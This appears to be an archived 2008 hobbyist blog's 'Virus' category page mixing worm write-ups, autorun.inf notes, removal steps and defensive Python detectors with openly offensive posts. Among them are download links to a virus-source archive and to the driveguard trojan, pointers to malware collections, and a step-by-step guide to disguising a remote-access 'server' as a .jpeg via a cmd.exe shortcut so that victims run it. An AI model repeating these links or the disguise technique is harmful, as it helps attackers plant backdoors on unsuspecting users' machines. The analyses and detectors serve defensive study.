techian.com

A Blog With No Limits


Archive for the ‘Virus’ Category

Drivemonitor.exe, flashguard.exe, driveguard.exe
All are the same: variants of Win32.Worm.Autoit.AL

Spreading: low
Damage: medium
Size: 212 Kb
Discovered: 2008 Jul 24

The presence of the following files:

%programfiles%\FlashGuard\FlashGuard.exe
%windrive%\FlashGuard\ReadMe.txt
%windrive%\FlashGuard\FlashGuard.exe

The presence of an autorun.inf on removable drives that contains:

[autorun]
open=System\Security\DriveGuard.exe -run
shell\Open=&Open
shell\Open\Command=System\Security\DriveGuard.exe -run
shell\Explore=&Explore
shell\Explore\Command=System\Security\DriveGuard.exe -run

Technical description:
This worm poses as a friendly application, one that claims to protect your removable drives from other malware.

The malicious file copies itself to %programfiles%\FlashGuard\FlashGuard.exe

It also includes a readme file that reads:
“This tiny software is used to protect removable storage devices from
worms that are spread from one PC to another. ”

It creates the following registry keys:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\FlashGuard
with the value “%windrive%\FlashGuard\FlashGuard.exe” -run

HKCU\Software\Microsoft\Windows\CurrentVersion\Run\FlashGuard
with the value “%windrive%\FlashGuard\FlashGuard.exe” -run

Copies the readme file to %windrive%\FlashGuard\ReadMe.txt

It checks whether any of the following processes are running:
iexplore.exe, alg.exe, csrss.exe, cssrs.exe, cssrss.exe, explore.exe,
expIorer.exe, csrss.exe, iexplorer.exe, lexplore.exe, lsass.exe, lssas.exe,
lssass.exe, scshost.exe, scvhost.exe, scvhsot.exe, smss.exe, smsss.exe,
spoolss.exe, spoolsv.exe, spoolvs.exe, ssms.exe, sssms.exe, ssvhost.exe,
svchost.exe, svchsot.exe, serivces.exe, taskmgr.exe, wilnogon.exe, winl0g0n.exe,
winlgoon.exe, winlogno.exe, winlogon.exe, wlnlogon.exe
and, if the process image is not one of:
\Program Files\Internet Explorer\iexplore.exe,
\system32\svchost.exe,
\system32\lsass.exe,
\system32\csrss.exe,
\system32\alg.exe,
\system32\winlogon.exe,
\system32\smss.exe,
\system32\spoolsv.exe,
\system32\taskmgr.exe
the process is terminated and its file is renamed with a “.bak” extension.

This worm also removes all files in C:\heap41a that belong to other malicious programs.

It re-enables Task Manager if it has been disabled.

It infects any removable drive by writing an autorun.inf and a copy of itself
to %drv%\System\Security\DriveGuard.exe with the hidden attribute set.

Payload:

It downloads executable files from http://[removed]/lndexnew.jpg
and http://[removed]/lndexnew.txt, copies them to the temporary directory under a random name,
and creates the registry key HKLM\software\microsoft\windows\currentversion\RunOnce\temp_cleanup
with the value “%temp_path%\[random].exe”.
All downloaded files are backdoors.
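The kill list above doubles as a catalogue of the look-alike names (scvhost.exe, winl0g0n.exe, lexplore.exe) that malware uses to blend in with system processes, and the two tests the worm applies, name comparison and expected image path, are exactly what a defender wants to run against a process list. The following is an added example, not code from the original post or from any vendor write-up; the expected-path table is taken from the list above, the homoglyph folding and edit-distance threshold are my own choices, and the process snapshot is constructed.

```python
"""Flag processes masquerading as Windows system binaries: look-alike names
(scvhost.exe, winl0g0n.exe) or a genuine name running from the wrong directory."""

# Genuine names and the directory each should run from, from the write-up above;
# matched as a lower-cased suffix of the process's image directory.
EXPECTED = {
    "iexplore.exe": r"\program files\internet explorer",
    "svchost.exe": r"\system32", "lsass.exe": r"\system32",
    "csrss.exe": r"\system32", "alg.exe": r"\system32",
    "winlogon.exe": r"\system32", "smss.exe": r"\system32",
    "spoolsv.exe": r"\system32", "taskmgr.exe": r"\system32",
}
# Characters that look alike in most fonts (l/I/1, o/0); folded before comparing.
CONFUSABLE = str.maketrans({"i": "l", "1": "l", "0": "o"})

def fold(name):
    return name.lower().translate(CONFUSABLE)

def edit_distance(a, b):
    """Levenshtein distance: insert, delete and substitute each cost 1."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def classify(name, directory):
    """Return None when the process looks genuine, otherwise the reason it does not."""
    n, d = name.lower(), directory.lower().rstrip("\\")
    if n in EXPECTED:
        return None if d.endswith(EXPECTED[n]) else f"{name}: unexpected directory {directory}"
    for real in EXPECTED:
        if fold(n) == fold(real):
            return f"{name}: homoglyph of {real}"
        # Short stems (alg, smss) tolerate one edit only, or arp.exe would match alg.exe.
        limit = 1 if len(real) - len(".exe") <= 4 else 2
        if edit_distance(n, real) <= limit:
            return f"{name}: near-miss of {real}"
    return None

def scan(processes):
    """processes: iterable of (name, image directory); returns [(name, reason), ...]."""
    return [(name, reason) for name, path in processes
            if (reason := classify(name, path)) is not None]

# Constructed snapshot (process name, image directory), not taken from a live host.
SAMPLE = [
    ("svchost.exe", r"C:\WINDOWS\system32"),
    ("scvhost.exe", r"C:\WINDOWS\system32"),
    ("winl0g0n.exe", r"C:\WINDOWS\system32"),
    ("lexplore.exe", r"C:\Program Files\Internet Explorer"),
    ("csrss.exe", r"C:\DOCUME~1\user\LOCALS~1\Temp"),
    ("notepad.exe", r"C:\WINDOWS\system32"),
]

if __name__ == "__main__":
    for _, reason in scan(SAMPLE):
        print(reason)
```

On a real host the (name, directory) pairs come from the process list, for example the ExecutablePath of each Win32_Process; the genuine svchost.exe and notepad.exe in the sample pass, the other four are reported.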

what is Autorun.inf

Posted on August 1, 2008 by admin | No Comments

Autorun.inf is the primary instruction file associated with the Autorun function. Autorun.inf itself is a simple text-based configuration file that tells the operating system which executable to start, which icon to use, and which additional menu commands to make available. In other words, autorun.inf tells Windows how to open the presentation and treat the contents of the CD.

The entire sequence is initiated when the “disk change notification” polling discovers a new disk in the CD or DVD ROM drive. Then, if the “Auto insert notification” feature is enabled (it is by default), Windows checks the new disk’s root directory for the existence of an “autorun.inf” file. If found, Windows reads and follows the specific instructions this file defines. If no autorun.inf file is found, Windows refers to the new disk by its serial number and executes the default actions associated with the (data or audio) content on the disk.

Autorun.inf defines the following:
Automatically run when CD is inserted: the process or application that will automatically run when a disk is inserted. Optionally, one can define the process or application that will run for specific operating environments.
Icon representing CD or DVD: the icon that will represent your application’s CD or DVD when the drive is viewed with My Computer or Explorer.
Menu commands when CD-ROM is clicked: menu commands displayed when the user right-clicks the CD-ROM icon in My Computer or Explorer.

A simple Autorun.inf example:
[autorun]
open=autorun.exe
icon=autorun.ico

In the same way it can be used to launch a malicious file, so beware.
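As an added example (not part of the original post), the following Python reads an autorun.inf, lists every command Windows would launch from it, and flags the pattern from the Win32.Worm.Autoit.AL write-up above, where the Open and Explore verbs are redirected to an executable in a nested folder. Both autorun.inf listings on this page are embedded as constructed inputs; the INI reader and the two heuristics are my own.

```python
"""Triage an autorun.inf: list every command it would make Windows run and flag the
verb hijack used by the worm above (Open/Explore pointing at a subfolder exe)."""
import re

# Constructed inputs copied from the two autorun.inf listings on this page.
WORM_AUTORUN = r"""[autorun]
open=System\Security\DriveGuard.exe -run
shell\Open=&Open
shell\Open\Command=System\Security\DriveGuard.exe -run
shell\Explore=&Explore
shell\Explore\Command=System\Security\DriveGuard.exe -run
"""
BENIGN_AUTORUN = r"""[autorun]
open=autorun.exe
icon=autorun.ico
"""

def parse_autorun(text):
    """Minimal INI reader: {section: {key: value}}, keys lower-cased, ';' comments skipped."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections

def triage(text):
    """Return (commands, findings): what would run, and why it looks hostile."""
    auto = parse_autorun(text).get("autorun", {})
    commands = {k: auto[k] for k in ("open", "shellexecute") if k in auto}
    for key, value in auto.items():
        m = re.fullmatch(r"shell\\([^\\]+)\\command", key)
        if m:
            commands["shell\\" + m.group(1)] = value
    findings = []
    # Explorer's default verbs: overriding them makes a double-click on the drive
    # (or 'Explore' in the context menu) launch the payload instead of a folder view.
    hijacked = [v for v in ("shell\\open", "shell\\explore") if v in commands]
    if hijacked:
        findings.append("default verbs overridden: " + ", ".join(hijacked))
    # A payload in a nested folder (System\Security\ here) is hidden from a casual
    # look at the drive root, where autorun.exe-style launchers normally live.
    for verb, cmd in commands.items():
        exe = cmd.split()[0] if cmd.split() else ""
        if "\\" in exe or "/" in exe:
            findings.append(f"{verb} runs from a subfolder: {exe}")
    return commands, findings

if __name__ == "__main__":
    for label, sample in (("worm", WORM_AUTORUN), ("benign", BENIGN_AUTORUN)):
        commands, findings = triage(sample)
        print(label, commands, findings)
```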

400 ViRuS in 1 file

Posted on July 13, 2008 by admin | No Comments

Avispa.dr
Dark Avenger
AVA.550
Univ/a
Auspar.377
Auspar.338
OC/oops
Middle
Auspar.635
Aus-Term.mp.3490
Jeru.1413
OC/scud
Auspar.dr
Auspar.635
Auspar.615
Auspar
Aust.543
Auspar.424
Auspar.377
Auspar.338
Auspar.292a
Auspar.215
Auspar.187
Auspar
Univ/b
Aurea.653
Iron-Maiden
Akuku.1111
Akuku.889
Akuku.886
NRLG.b
Attitude
Attention.394
HLL.ow.4505
Attention.394.dam
Xany
Univ/g
Univ/q
Univ.cmp
OC/vcl
Atomant.2143
AT
Atomic.350
Astra.1010
Suriv.dr
Comasp
Shocker.cmp.7000
Tiebud
BtDr.b
Ash.743
Univ/r
Armagedon.y
Armagedon
Vienna
ARCV.Scy.1208
ARCV.Scroll.795
ARCV.Scroll.dr
ARCV.Sand.1172
ARCV.More
ARCV.Kiss
ARCV.Jo.986
ARCV.Jo.912a
ARCV.250.dr
ARCV.642
ARCV.639a
ARCV.1183.dr
ARCV.Anna.742.dr
ARCV.639a
ARCV.Jo.916
ARCV.839
ARCV.Slime.773
ARCV.Ice
ARCV.Ice
Univ/q
ARCV.330a
ARCV.255
Crew.2480
Univ/o
7thSon.426
Arara.dr
Arara.1054
Arab.834
Armagedon.y
QScreen3
Suriv.1488
Suriv.dr
Dark Avenger.2000
Jerusalem.cr
Jerusalem.cr
APLittle.153
APLittle.150
APLittle.147
APLittle.142a
APLittle.118a
APLittle.153
Univ.topsy
Anti-Pascal
Tiny-GM.129
Jerusalem
BtDr.Unk2
Jeru.1605
AntiMIT
Antiexe
Murphy
Thanksgiving.mp.1253a
Anticad.3012a
Anticad.mp.4096.d
Anticad.2900
Anticad.mp.4096.a
Anticad.2646
Anthrax.mp.1024
Univ.ow/d
Vacsina.1206
ARCV.Anna.742.dr
HLLP.Animus
Andromeda
Jerusalem.ch
Jeru.1808.a
QZap141
Pixel.845
Pixel.k
Ambulance
AlphaStrike.2000
Alien.733.a
Alia.1023
YD.1049.a
Alex.1951
Brain
Albania
Alabama.1560.a
Akuku.886
Tiebud
BtDr.Aircop
BtDr.b
HLL.ow
HLL.cmp.8064
AHADisk
Agiplan
YDOC/vcl
Syslock.dropped
NRLG.b
V2P6.1993
Dead
BitAddict
ARCV.Scroll.795
ARCV.Scroll.dr
Acid.dr
And many more...
Download link:

http://rapidshare.com/files/82708010/Virus_Source.zip

Converting .exe files to .jpg

Posted on July 8, 2008 by admin | No Comments

This may be helpful for some people.
1. Firstly, create a new folder and make sure that the option ‘show hidden files’ is checked and ‘hide extensions for known file types’ is unchecked. Basically what you need is to see hidden files and the extension of all the files on your PC.

2. Paste a copy of your server in the newly created folder. Let’s say it’s called server.exe (that’s why you need the file extensions showing, because you need to see it to change it).

3. Now you’re going to rename this server.exe to whatever you want, let’s say for example picture.jpeg.

4. Windows is going to ask whether you really want to change the extension from exe to jpeg; click YES.

5. Now create a shortcut to this picture.jpeg in the same folder.

6. Now that you have a shortcut, rename it to whatever you want, for example me.jpeg.

7. Go to Properties (on the file me.jpeg); you need to make some changes there.

8. First of all, delete all the text in the START IN field and leave it empty.

9. Then in the TARGET field you need to write the path that opens the other file (the server renamed to picture.jpeg), so you have to write: C:\WINDOWS\system32\cmd.exe /c picture.jpeg

10. The last part, /c picture.jpeg, is always the name of the first file. If you called the first file soccer.avi you have to write C:\WINDOWS\system32\cmd.exe /c soccer.avi, got it?

11. So what you’re doing is: when someone clicks on me.jpeg, a cmd will execute the other file, picture.jpeg, and the server will run.

12. On that file me.jpeg (the shortcut), go to Properties and you have an option to change the icon. Click it, a new window will pop up, and you have to write: %SystemRoot%\system32\SHELL32.dll . Then press OK.

13. You can set the HIDDEN property on the first file (picture.jpeg) if you think it’s better to get a connection from someone.

14. But don’t forget one thing: these 2 files must always be together in the same folder, and to get connected to someone they must click on the shortcut you created, not on the first file. So rename the files to whatever you want, considering the person and the knowledge they have on this matter.
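From the defender's side, the two artefacts this post leaves on disk are easy to test for: a file with a media extension whose content begins with the PE ‘MZ’ header, and a shortcut whose stored command line runs cmd.exe. The following is an added example, not code from the original post; the shortcut check is a byte-string heuristic rather than a Shell Link parser, and all sample files (including the shortcut-like blob) are constructed in a temporary directory.

```python
"""Spot the disguise described above: a PE executable renamed to a media extension,
plus a shortcut that launches it through cmd.exe /c."""
import os
import tempfile

# Leading bytes a file with each extension should start with.
MAGIC = {
    ".jpg": (b"\xff\xd8\xff",), ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",), ".gif": (b"GIF87a", b"GIF89a"),
    ".avi": (b"RIFF",), ".bmp": (b"BM",),
}
PE_MAGIC = b"MZ"               # DOS header every Windows .exe/.dll begins with
LNK_HEADER = b"L\x00\x00\x00"  # HeaderSize field (0x4C) that opens a Shell Link file

def inspect_file(path):
    """Return a reason string when the file matches the trick, else None."""
    name = os.path.basename(path)
    ext = os.path.splitext(name)[1].lower()
    with open(path, "rb") as f:
        data = f.read(64 * 1024)
    if ext in MAGIC:
        if data.startswith(PE_MAGIC):
            return f"{name}: {ext} extension but PE executable content"
        if not any(data.startswith(m) for m in MAGIC[ext]):
            return f"{name}: {ext} extension but unrecognised header"
    if ext == ".lnk" and data.startswith(LNK_HEADER):
        # Byte-string heuristic, not a Shell Link parser: string fields are UTF-16LE
        # when the IsUnicode flag is set and ANSI otherwise, so try both encodings.
        if any(n in data for n in (b"cmd.exe", "cmd.exe".encode("utf-16-le"))):
            return f"{name}: shortcut runs cmd.exe"
    return None

def scan_tree(root):
    """Inspect every file under root (sorted for stable output); return the findings."""
    return [r for dirpath, _, files in os.walk(root)
            for fn in sorted(files)
            if (r := inspect_file(os.path.join(dirpath, fn))) is not None]

def build_sample(root):
    # Constructed test files (no real malware); the .lnk is a fabricated blob with
    # Shell Link header bytes followed by the argument string a real shortcut stores.
    samples = {
        "picture.jpeg": PE_MAGIC + b"\x90\x00\x03\x00" + b"\x00" * 60,  # renamed .exe
        "holiday.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00",              # real JPEG header
        "soccer.avi": b"RIFF\x00\x10\x00\x00AVI LIST",                   # real AVI header
        "me.jpeg.lnk": LNK_HEADER + b"\x01\x14\x02\x00" + b"\x00" * 68   # shows as me.jpeg
        + r"C:\WINDOWS\system32\cmd.exe /c picture.jpeg".encode("utf-16-le"),
    }
    for fn, blob in samples.items():
        with open(os.path.join(root, fn), "wb") as f:
            f.write(blob)
    return sorted(samples)

def demo():
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        return scan_tree(tmp)

if __name__ == "__main__":
    print("\n".join(demo()))
```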

VIRUS SOURCE CODES+READYMADE

Posted on July 8, 2008 by admin | No Comments

vx.netlux.org/vl.php
This site is also known as Virus Heaven:
around 4 GB of ready-made viruses.

You can also get many viruses in source-code form.

http://www.totallygeek.com/vscdb/
This site is a virus source code database;
many are in assembly language and many in C, VB, etc.

amvo.exe virus removal

Posted on July 8, 2008 by admin | No Comments

amvo

removal methods

The Amvo virus attacks Yahoo! Messenger.
It consists of 3 files:
windows\system32\amvo.exe
windows\system32\amvo1.dll
windows\system32\amvo0.dll

Just delete these 3 files and the virus is gone, and do not forget to remove the startup entry for amvo.exe, either from msconfig, regedit or any third-party tool.

1. Open Task Manager
2. End Task Explorer.exe
3. Select Run from File Menu
4. Type cmd (press enter)
5. In Command Prompt Type: cd %windir%\system32
6. Type: attrib -s -h -r amvo*.*
7. Type del amvo*.*
8. Remove the startup entries and the virus is gone :)

http://mtaram.wordpress.com/2008/01/03/computer-troubleshooting-virus-issues/

Posted on January 3, 2008 by mtaram

Recently I had a big time trouble with my computer as all the drives failed to open on double clicking and showed me an application selection window instead. After searching through the running processes and other settings I found that the show hidden files option in the folder options was also not working.

With the help of one of my friends [MOHIT] I fixed the issues.

The problem was due to amvo.exe amvo0.dll ampo.exe amvol.dll xfoolavp.com usdeiect.com and autorun.inf present in every drive’s root.

The fix works as follows…

open task manager (if your task manager doesn’t open and shows errors and warnings then use this tool
http://www.brothersoft.com/rrt-(remove-restrictions-tool)-60879.html
and end task the above mentioned processes if you see them in the running process list from the processes pane. Then go to the applications pane and click on new task and type in cmd or command. Once at the command prompt type in “cd\” without the quotes to go to the root of the current drive. Then type “del /f /a /s /q”

where of the files above mentioned (this method can also be used to force delete any unwanted file). Use this method to delete all the above mentioned files from the root of every drive.

After this open registry editor by clicking on new task and typing in “regedit” without quotes. Then go to HKCU > software > microsoft > windows > current version > explorer > advanced > then look for the hidden key in the right pane and change the value to 1 from 2.

And to fix the issues with drives not opening or search opening up on double click download this .reg
http://megamachine.infinites.net/open.reg
(right click and save target as) file and double click it and add to your registry.

or do this…

copy everything under this line, paste it in Notepad, save it with a .reg extension on your desktop and double-click it

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\Directory\shell]
@="Open"
[HKEY_CLASSES_ROOT\Directory\shell\Explore]
[HKEY_CLASSES_ROOT\Directory\shell\Explore\command]
@="%SystemRoot%\\Explorer.exe /e,/root,\"%1\""
[HKEY_CLASSES_ROOT\Directory\shell\Explore\ddeexec]
@="[ExploreFolder(\"%l\", %I, %S)]"
"NoActivateHandler"=""
[HKEY_CLASSES_ROOT\Directory\shell\Explore\ddeexec\application]
@="Folders"
[HKEY_CLASSES_ROOT\Directory\shell\Explore\ddeexec\topic]
@="AppProperties"
[HKEY_CLASSES_ROOT\Directory\shell\find]
"SuppressionPolicy"=dword:00000080
[HKEY_CLASSES_ROOT\Directory\shell\find\command]
@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,\
00,5c,00,45,00,78,00,70,00,6c,00,6f,00,72,00,65,00,72,00,2e,00,65,00,78,00,\
65,00,00,00
[HKEY_CLASSES_ROOT\Directory\shell\find\ddeexec]
@="[FindFolder(\"%l\", %I)]"
"NoActivateHandler"=""
[HKEY_CLASSES_ROOT\Directory\shell\find\ddeexec\application]
@="Folders"
[HKEY_CLASSES_ROOT\Directory\shell\find\ddeexec\topic]
@="AppProperties"
[HKEY_CLASSES_ROOT\Directory\shell\Open]
"BrowserFlags"=dword:00000010
"ExplorerFlags"=dword:00000012
[HKEY_CLASSES_ROOT\Directory\shell\Open\command]
@="%SystemRoot%\\Explorer.exe /idlist"
[HKEY_CLASSES_ROOT\Directory\shell\Open\ddeexec]
@="[ViewFolder(\"%l\", %I, %S)]"
"NoActivateHandler"=""
[HKEY_CLASSES_ROOT\Directory\shell\Open\ddeexec\application]
@="Folders"
[HKEY_CLASSES_ROOT\Directory\shell\Open\ddeexec\topic]
@="AppProperties"
[HKEY_CLASSES_ROOT\Directory\shell\Openddeexec]
[HKEY_CLASSES_ROOT\Directory\shell\Openddeexec\ifexec]
@="[]"
[HKEY_CLASSES_ROOT\Folder\shell]
@="open"
[HKEY_CLASSES_ROOT\Folder\shell\explore]
"BrowserFlags"=dword:00000022
"ExplorerFlags"=dword:00000021
[HKEY_CLASSES_ROOT\Folder\shell\explore\command]
@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,\
00,5c,00,45,00,78,00,70,00,6c,00,6f,00,72,00,65,00,72,00,2e,00,65,00,78,00,\
65,00,20,00,2f,00,65,00,2c,00,2f,00,69,00,64,00,6c,00,69,00,73,00,74,00,2c,\
00,25,00,49,00,2c,00,25,00,4c,00,00,00
[HKEY_CLASSES_ROOT\Folder\shell\explore\ddeexec]
@="[ExploreFolder(\"%l\", %I, %S)]"
"NoActivateHandler"=""
[HKEY_CLASSES_ROOT\Folder\shell\explore\ddeexec\application]
@="Folders"
[HKEY_CLASSES_ROOT\Folder\shell\explore\ddeexec\ifexec]
@="[]"
[HKEY_CLASSES_ROOT\Folder\shell\explore\ddeexec\topic]
@="AppProperties"
[HKEY_CLASSES_ROOT\Folder\shell\open]
"BrowserFlags"=dword:00000010
"ExplorerFlags"=dword:00000012
[HKEY_CLASSES_ROOT\Folder\shell\open\command]
@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,\
00,5c,00,45,00,78,00,70,00,6c,00,6f,00,72,00,65,00,72,00,2e,00,65,00,78,00,\
65,00,20,00,2f,00,69,00,64,00,6c,00,69,00,73,00,74,00,2c,00,25,00,49,00,2c,\
00,25,00,4c,00,00,00
[HKEY_CLASSES_ROOT\Folder\shell\open\ddeexec]
@="[ViewFolder(\"%l\", %I, %S)]"
"NoActivateHandler"=""
[HKEY_CLASSES_ROOT\Folder\shell\open\ddeexec\application]
@="Folders"
[HKEY_CLASSES_ROOT\Folder\shell\open\ddeexec\ifexec]
@="[]"
[HKEY_CLASSES_ROOT\Folder\shell\open\ddeexec\topic]
@="AppProperties"
[HKEY_CLASSES_ROOT\Drive\shell]
@="open_[1]"
[HKEY_CLASSES_ROOT\Drive\shell\find]
"SuppressionPolicy"=dword:00000080
[HKEY_CLASSES_ROOT\Drive\shell\find\command]
@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,\
00,5c,00,45,00,78,00,70,00,6c,00,6f,00,72,00,65,00,72,00,2e,00,65,00,78,00,\
65,00,00,00
[HKEY_CLASSES_ROOT\Drive\shell\find\ddeexec]
@="[FindFolder(\"%l\", %I)]"
"NoActivateHandler"=""
[HKEY_CLASSES_ROOT\Drive\shell\find\ddeexec\application]
@="Folders"
[HKEY_CLASSES_ROOT\Drive\shell\find\ddeexec\topic]
@="AppProperties"
[HKEY_CLASSES_ROOT\Drive\shell\open]
[HKEY_CLASSES_ROOT\Drive\shell\open\command]
@="%SystemRoot%\\Explorer.exe /idlist,%I,%L"
[HKEY_CLASSES_ROOT\Drive\shell\open\ddeexec]
[HKEY_CLASSES_ROOT\Drive\shell\open\ddeexec\topic]
@="AppProperties"

another solution [simple]

driveguard.exe virus

Posted on July 8, 2008 by admin | No Comments

Removal of the Driveguard.exe virus is very easy: open Task Manager and end the driveguard.exe process, and if any process with a .tmp extension is running, end that too. Then remove its entry from startup via msconfig. Also don’t forget to delete your temp files.

How I found it:
Today one of my friends came to me for some files from my system.. he inserted his pen drive and clicked here.. there.. result: PC got infected

I found the process driveguard.exe in Task Manager

it was trying to access the site
http://www.freewebs.com/microsotf/
and download some Update-KB684903-x86.exe file..
http://rapidshare.com/files/127625927/Update-KB684903-x86.rar.html

which was detected by NOD as a trojan

the site is still alive as the admins of freewebs are too damn lazy to take action

download link for the driveguard file
http://rapidshare.com/files/127625326/WinDriveGuard.rar.html

read the text file.. it claims to be a “spyware removal tool”